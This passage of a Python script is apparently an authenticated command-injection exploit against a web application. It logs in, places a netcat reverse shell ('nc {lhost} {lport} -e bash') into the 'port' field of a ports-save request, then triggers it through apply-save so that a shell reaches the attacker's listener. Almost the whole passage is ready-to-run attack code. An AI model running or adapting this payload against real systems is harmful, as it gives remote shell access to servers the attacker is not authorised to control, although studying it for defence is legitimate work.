# Authenticate to the app
print("[+] Attempting login with the provided credentials...")
login_data = {"username":user, "password":password}
session = requests.session()
try:
login = session.post(f'{target}/login',data=login_data,verify=False)
except Exception as ex:
print("[!] There was a problem connecting to the app, error:", ex)
exit(1)
# Send the payload, the port parameter suffers from a command injection vulnerability
print("[+] Attempting to send payload.")
rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}
send_payload = session.post(f"{target}/ports-save",data=data,verify=False)
if send_payload.status_code != 200:
print("[!] Failed to send payload.")
exit(1)
else:
print("[+] Payload sent.")
# Trigger the execution of the payload
print("[+] Attempting execution.")
data = {"step_1":"", "step_2":""}
execute = session.post(f"{target}/apply-save",data=data, verify=False)
if execute.status_code != 200:
print("[!] Attempt to execute failed.")
exit(1)
else:
print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")